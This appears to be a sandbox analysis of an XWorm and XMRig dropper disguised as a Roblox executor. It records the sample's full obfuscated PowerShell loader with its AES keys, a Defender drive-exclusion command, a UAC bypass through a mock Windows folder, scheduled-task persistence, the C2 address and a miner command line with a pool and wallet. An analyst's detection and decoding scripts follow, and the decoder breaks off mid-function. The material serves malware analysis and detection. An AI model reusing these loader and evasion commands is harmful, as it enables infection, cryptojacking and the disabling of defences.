Analysis
- max time kernel: 147s
- max time network: 143s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22-05-2024 18:40
Static task: static1
Behavioral task: behavioral1 (sample: RblxExecutor.exe, resource: win7-20240508-en)
General
- Target: RblxExecutor.exe
- Size: 1.6MB
- MD5: 3a235f7f491d95d4727320239c0b4cb7
- SHA1: b66d02b69f9d2cf011164406c6bc93a6728a65eb
- SHA256: e9397b42b5c3f7770b873a76355bd59cbe097f30dc9b9349e9787832bbe9767a
- SHA512: fa40f2d94bbe25372fc5eecb87168c3a55fb3fff1486ebd57d1f944760b43cc77a891fdbc246d5379e02b88b7f4f6abea0c94162e88ff87cabd246c7d8a5d83b
- SSDEEP: 24576:O83AQ99hyIMVdMJgsIX3b9M5Mm2f+qnbyy3q3PIMPKgPe8CWZoPJRMyoE:OWAE9AInJfF8dbRiteGmJKy
Malware Config
Extracted: xworm
- C2 (host:port): 185.196.8.135:7000
- install_file: USB.exe
Signatures

Detect Xworm Payload 1 IoCs
- yara family_xworm: behavioral2/memory/3248-56-0x000001BFCD410000-0x000001BFCD428000-memory.dmp (powershell.exe, PID 3248)

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
- RblxExecutor.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- RblxExecutor.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__
- RblxExecutor.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
- RblxExecutor.exe: Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions

Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs
- RblxExecutor.exe: File opened (read-only) C:\Windows\System32\drivers\VBoxSF.sys
- RblxExecutor.exe: File opened (read-only) C:\Windows\System32\drivers\VBoxVideo.sys
- RblxExecutor.exe: File opened (read-only) C:\Windows\System32\drivers\VBoxMouse.sys
- RblxExecutor.exe: File opened (read-only) C:\Windows\System32\drivers\VBoxGuest.sys

XMRig Miner payload 9 IoCs
- yara xmrig, nine hits on the same region of PID 4108 (AddInProcess.exe): behavioral2/memory/4108-N-0x0000000140000000-0x00000001407CF000-memory.dmp for N = 142, 143, 145, 146, 147, 148, 149, 150, 151

Blocklisted process makes network request 8 IoCs
- flows 24, 32: powershell.exe (PID 3248)
- flows 33, 35, 36, 50, 52, 54: powershell.exe (PID 1980)

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
- powershell.exe PIDs 3752, 3248, 1980, 2596, 3264, 4660, 968

Looks for VMWare drivers on disk 2 TTPs 2 IoCs
- RblxExecutor.exe: File opened (read-only) C:\Windows\System32\drivers\vmhgfs.sys
- RblxExecutor.exe: File opened (read-only) C:\Windows\System32\drivers\vmmouse.sys

Executes dropped EXE 1 IoCs
- ComputerDefaults.exe (PID 4264)

Loads dropped DLL 1 IoCs
- ComputerDefaults.exe (PID 4264)

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 23: ip-api.com

Suspicious use of SetThreadContext 1 IoCs
- powershell.exe (PID 1980) set thread context of AddInProcess.exe (PID 4108)

Enumerates processes with tasklist 1 TTPs 8 IoCs
- tasklist.exe PIDs 4448, 892, 5064, 392, 3684, 3828, 2852, 1132

Enumerates system info in registry 2 TTPs 1 IoCs
- RblxExecutor.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName

Suspicious behavior: EnumeratesProcesses 64 IoCs
- RblxExecutor.exe (PID 4200) and powershell.exe PIDs 3248, 1980, 968, 2596, 3264, 3732, 4660, 3576, 3752; the listing is capped at 64 entries and its tail is a long run of PID 1980

Suspicious use of AdjustPrivilegeToken 64 IoCs
- SeDebugPrivilege: tasklist.exe PIDs 3828, 2852, 1132, 4448, 892, 5064, 392, 3684; powershell.exe PIDs 3248, 1980, 968, 2596, 3264
- powershell.exe PID 3732: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- powershell.exe PID 4660: the same sequence, then SeIncreaseQuotaPrivilege through SeProfSingleProcessPrivilege a second time before the listing is capped at 64 entries
- Privileges 33 to 36 are reported by LUID only; on Windows 10 those LUIDs are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. The notable behaviour is a process enabling every privilege in its token in one sweep, not SeDebugPrivilege alone, which tasklist.exe requests legitimately.

Suspicious use of FindShellTrayWindow 1 IoCs
- AddInProcess.exe (PID 4108)

Suspicious use of WriteProcessMemory 64 IoCs
Each parent-to-child write appears twice in the raw listing; collapsed here to one line per parent.
- RblxExecutor.exe 4200 -> cmd.exe 4408, 2064, 4036, 1584, 1028, 4108, 228, 2168, 1292, 4284
- cmd.exe 4408 -> tasklist.exe 3828, find.exe 2620
- cmd.exe 2064 -> tasklist.exe 2852, find.exe 2484
- cmd.exe 4036 -> tasklist.exe 1132, find.exe 2352
- cmd.exe 1584 -> tasklist.exe 4448, find.exe 3372
- cmd.exe 1028 -> tasklist.exe 892, find.exe 1636
- cmd.exe 4108 -> tasklist.exe 5064, find.exe 3524
- cmd.exe 228 -> tasklist.exe 392, find.exe 3580
- cmd.exe 2168 -> tasklist.exe 3684, find.exe 3964
- cmd.exe 1292 -> cmd.exe 2396, cmd.exe 3144, powershell.exe 3248
- cmd.exe 4284 -> cmd.exe 2752, cmd.exe 4788, powershell.exe 1980
- The first eight cmd.exe children are the tasklist VM probes; 1292 and 4284 are the two batch launchers, in the order the tree lists them (VCRedist.bat, then VCRedists.bat). That places the XWorm memory hit (PID 3248) under VCRedist.bat and the miner injection into AddInProcess.exe (from PID 1980) under VCRedists.bat.
- PID 4108 is reused during the run: it is one of the probe cmd.exe processes here and, after that process exits, the AddInProcess.exe that receives the miner. Correlate on PID together with image name and start time, not PID alone.
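Analyst note. The tasklist and WriteProcessMemory entries above are one pattern: RblxExecutor.exe runs cmd.exe /c tasklist /FI "IMAGENAME eq <name>" 2>NUL | find /I "<name>" >NUL once for each of vmtoolsd.exe, vboxservice.exe, vmwaretray.exe, vmwareuser.exe, vmsrvc.exe, Any.Run-VM-X64.exe, vboxtray.exe and VBoxService.exe (the last is a case variant of the second; find /I already matches case-insensitively), on top of the ACPI registry, Guest Additions and driver-file checks. Eight such children of one parent inside a few seconds is a reliable thing to alert on. The PowerShell below is an added example and is not part of the sandbox output or the sample: it flattens Security event 4688 (process command-line auditing must be enabled for the CommandLine field to be populated), keeps the tasklist probes for known hypervisor and sandbox process names, and reports any parent that issues a burst of them. The thresholds and the constructed sample events at the end, which mirror this tree so the logic can be exercised without the event log, are the author's assumptions.

```powershell
# Added example, not from the report or the sample: detect the tasklist-based
# VM/sandbox probe burst shown in this analysis from Security 4688 events.
# Live use needs "Audit Process Creation" with "Include command line in process
# creation events"; the constructed sample at the bottom runs without it.

# Process names probed by this sample (from the process tree), lower-cased for comparison.
$VmProbeNames = @('vmtoolsd.exe', 'vboxservice.exe', 'vmwaretray.exe', 'vmwareuser.exe',
                  'vmsrvc.exe', 'any.run-vm-x64.exe', 'vboxtray.exe')

function Get-ProcessCreationEvents {
    # Flatten 4688 events into objects carrying only the fields the detection needs.
    param([datetime]$Since = (Get-Date).AddHours(-24))
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } -ErrorAction Stop |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                TimeCreated       = $_.TimeCreated
                NewProcessName    = $data['NewProcessName']
                ParentProcessName = $data['ParentProcessName']
                CommandLine       = $data['CommandLine']
            }
        }
}

function Find-VmProbeBursts {
    # Flag any parent that launches at least $MinProbes VM-name tasklist filters
    # within $WindowSeconds. Both thresholds are assumptions; tune per environment.
    param([object[]]$Events, [int]$MinProbes = 3, [int]$WindowSeconds = 30)

    $probes = foreach ($e in $Events) {
        if ($e.CommandLine -match '(?i)tasklist(\.exe)?\s+/FI\s+"IMAGENAME eq ([^"]+)"' -and
            $VmProbeNames -contains $Matches[2].ToLower()) {
            [pscustomobject]@{ Time = $e.TimeCreated; Parent = $e.ParentProcessName; Probe = $Matches[2] }
        }
    }
    foreach ($group in ($probes | Group-Object Parent)) {
        $sorted = @($group.Group | Sort-Object Time)
        $span   = ($sorted[-1].Time - $sorted[0].Time).TotalSeconds
        if ($sorted.Count -ge $MinProbes -and $span -le $WindowSeconds) {
            [pscustomobject]@{
                Parent      = $group.Name
                Count       = $sorted.Count
                SpanSeconds = [int]$span
                Probes      = ($sorted.Probe | Select-Object -Unique) -join ', '
            }
        }
    }
}

# Constructed sample modelled on this report: one cmd.exe per probe, all children of
# RblxExecutor.exe, a second apart. On a live host use Get-ProcessCreationEvents instead.
$t0 = Get-Date '2024-05-22 18:41:00'
$i  = 0
$sample = foreach ($name in $VmProbeNames + 'VBoxService.exe') {
    $row = [pscustomobject]@{
        TimeCreated       = $t0.AddSeconds($i)
        NewProcessName    = 'C:\Windows\System32\cmd.exe'
        ParentProcessName = 'C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe'
        CommandLine       = "C:\Windows\system32\cmd.exe /c tasklist /FI `"IMAGENAME eq $name`" 2>NUL | find /I `"$name`" >NUL"
    }
    $i++
    $row
}
# A single interactive check by an administrator must not trip the rule on its own.
$sample += [pscustomobject]@{
    TimeCreated       = $t0.AddMinutes(5)
    NewProcessName    = 'C:\Windows\System32\tasklist.exe'
    ParentProcessName = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    CommandLine       = 'tasklist /FI "IMAGENAME eq vmtoolsd.exe"'
}

Find-VmProbeBursts -Events $sample | Format-Table -AutoSize
```

Against the constructed sample only the RblxExecutor.exe parent is reported, with all eight probes inside the window; the lone powershell.exe-launched tasklist stays below the minimum. On a live host, 4688 also records the tasklist.exe children themselves with cmd.exe as parent, so the same burst will show up a second time under C:\Windows\System32\cmd.exe.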
Processes
(tree depth in brackets; "cmd:" is the recorded command line; the signatures the process triggered follow it)

[1] C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Looks for VirtualBox Guest Additions in registry
    - Looks for VirtualBox drivers on disk
    - Looks for VMWare drivers on disk
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmtoolsd.exe" 2>NUL | find /I "vmtoolsd.exe" >NUL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        cmd: tasklist /FI "IMAGENAME eq vmtoolsd.exe"
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        cmd: find /I "vmtoolsd.exe"

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxservice.exe" 2>NUL | find /I "vboxservice.exe" >NUL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        cmd: tasklist /FI "IMAGENAME eq vboxservice.exe"
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        cmd: find /I "vboxservice.exe"

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwaretray.exe" 2>NUL | find /I "vmwaretray.exe" >NUL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        cmd: tasklist /FI "IMAGENAME eq vmwaretray.exe"
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        cmd: find /I "vmwaretray.exe"

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwareuser.exe" 2>NUL | find /I "vmwareuser.exe" >NUL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        cmd: tasklist /FI "IMAGENAME eq vmwareuser.exe"
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        cmd: find /I "vmwareuser.exe"

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmsrvc.exe" 2>NUL | find /I "vmsrvc.exe" >NUL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        cmd: tasklist /FI "IMAGENAME eq vmsrvc.exe"
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        cmd: find /I "vmsrvc.exe"

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe" 2>NUL | find /I "Any.Run-VM-X64.exe" >NUL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        cmd: tasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe"
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        cmd: find /I "Any.Run-VM-X64.exe"

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxtray.exe" 2>NUL | find /I "vboxtray.exe" >NUL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        cmd: tasklist /FI "IMAGENAME eq vboxtray.exe"
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        cmd: find /I "vboxtray.exe"

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq VBoxService.exe" 2>NUL | find /I "VBoxService.exe" >NUL
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        cmd: tasklist /FI "IMAGENAME eq VBoxService.exe"
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        cmd: find /I "VBoxService.exe"

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedist.bat
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        cmd: cmd /c "set __=^&rem"
    [3] C:\Windows\system32\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Al1zbpAcw0p1Fl078pB2HtNXnQs0rbUPPgfd/fVywvU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c9QR5kB90gp/nHGBONlVKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PUtXp=New-Object System.IO.MemoryStream(,$param_var); $QjusM=New-Object System.IO.MemoryStream; $jUotk=New-Object System.IO.Compression.GZipStream($PUtXp, [IO.Compression.CompressionMode]::Decompress); $jUotk.CopyTo($QjusM); $jUotk.Dispose(); $PUtXp.Dispose(); $QjusM.Dispose(); $QjusM.ToArray();}function execute_function($param_var,$param2_var){ $wbVDd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vzMCH=$wbVDd.EntryPoint; $vzMCH.Invoke($null, $param2_var);}$wGIQB = 'C:\Users\Admin\AppData\Local\Temp\VCRedist.bat';$host.UI.RawUI.WindowTitle = $wGIQB;$pFEsp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wGIQB).Split([Environment]::NewLine);foreach ($QqrJY in $pFEsp) { if ($QqrJY.StartsWith('PDfUAcFoTbCJIUyLDOns')) { $XhjVr=$QqrJY.Substring(20); break; }}$payloads_var=[string[]]$XhjVr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmd: "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedists.bat
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        cmd: cmd /c "set __=^&rem"
    [3] C:\Windows\system32\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\VCRedists.bat';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          cmd: "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
        [5] C:\Windows \System32\ComputerDefaults.exe
            cmd: "C:\Windows \System32\ComputerDefaults.exe"
            - Executes dropped EXE
            - Loads dropped DLL
          [6] C:\Windows\SYSTEM32\cmd.exe
              cmd: cmd.exe /c call SC.cmd
            [7] C:\Windows\system32\cmd.exe
                cmd: cmd /c "set __=^&rem"
            [7] C:\Windows\system32\cmd.exe
                cmd: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          cmd: "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\VCRedists')
          - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
          cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG_CPU -p x --cpu-max-threads-hint=50
          - Suspicious use of FindShellTrayWindow
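Analyst note on the three cmd.exe /S /D /c" echo function decrypt_function ... " entries in the tree. VCRedist.bat, VCRedists.bat and SC.cmd all carry the same loader: cmd echoes a PowerShell script, and the sibling powershell.exe -noprofile -windowstyle hidden -ep bypass, which has no script on its command line, takes it on standard input. The script hides its .NET calls behind reversed strings ('gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL' is Load, 'txeTllAdaeR' is ReadAllText). It then re-reads the batch file, keeps the one line that starts with a 20-character marker (PDfUAcFoTbCJIUyLDOns in VCRedist.bat, EPPMCDiGgDdpsovvYHWW in VCRedists.bat and SC.cmd), splits the rest on '\' into two blobs, undoes a '#' for '/' and '@' for 'A' substitution that keeps the blob from being valid base64 on disk, base64-decodes, decrypts with AES-256-CBC/PKCS7 under the hardcoded key and IV (32-byte key, 16-byte IV), gunzips, and runs each result through Assembly.Load and EntryPoint.Invoke, the first with null arguments and the second with an empty string array. By PID, the VCRedist.bat branch ends in the powershell.exe whose memory matched the XWorm rule (3248) and the VCRedists.bat branch in the one that set the thread context of AddInProcess.exe for the miner (1980). The script below is an added example, not from the report or the sample: it repeats the decode steps against a captured batch file but writes the plaintext assemblies to disk for static analysis instead of loading them. The marker, key and IV values are the ones in this report; a different build will have its own and they must be read from its stub. Parameter names and the output naming are the author's choice.

```powershell
# Added example, not from the report or the sample: decrypt the .NET payloads
# embedded in VCRedist.bat, VCRedists.bat or SC.cmd without executing them.
# Marker, key and IV per stub are copied from the command lines in the tree;
# any other build of this loader needs its own triple, read from its stub.
param(
    [Parameter(Mandatory)][string]$BatPath,
    [string]$OutDir = (Join-Path (Split-Path -Parent $BatPath) 'decoded')
)

$Profiles = @(
    @{ Marker = 'PDfUAcFoTbCJIUyLDOns'; Key = 'Al1zbpAcw0p1Fl078pB2HtNXnQs0rbUPPgfd/fVywvU='; IV = 'c9QR5kB90gp/nHGBONlVKA==' }  # VCRedist.bat
    @{ Marker = 'EPPMCDiGgDdpsovvYHWW'; Key = 'NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='; IV = 'OAdUsJh095yGIv9rWxpY0Q==' }  # VCRedists.bat, SC.cmd
)

function Unprotect-LoaderBlob {
    # Same steps as the stub's decrypt_function and decompress_function
    # (AES-256-CBC with PKCS7 padding, then gzip), returning bytes instead of
    # handing them to Assembly.Load.
    param([byte[]]$Cipher, [string]$KeyB64, [string]$IvB64)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyB64)
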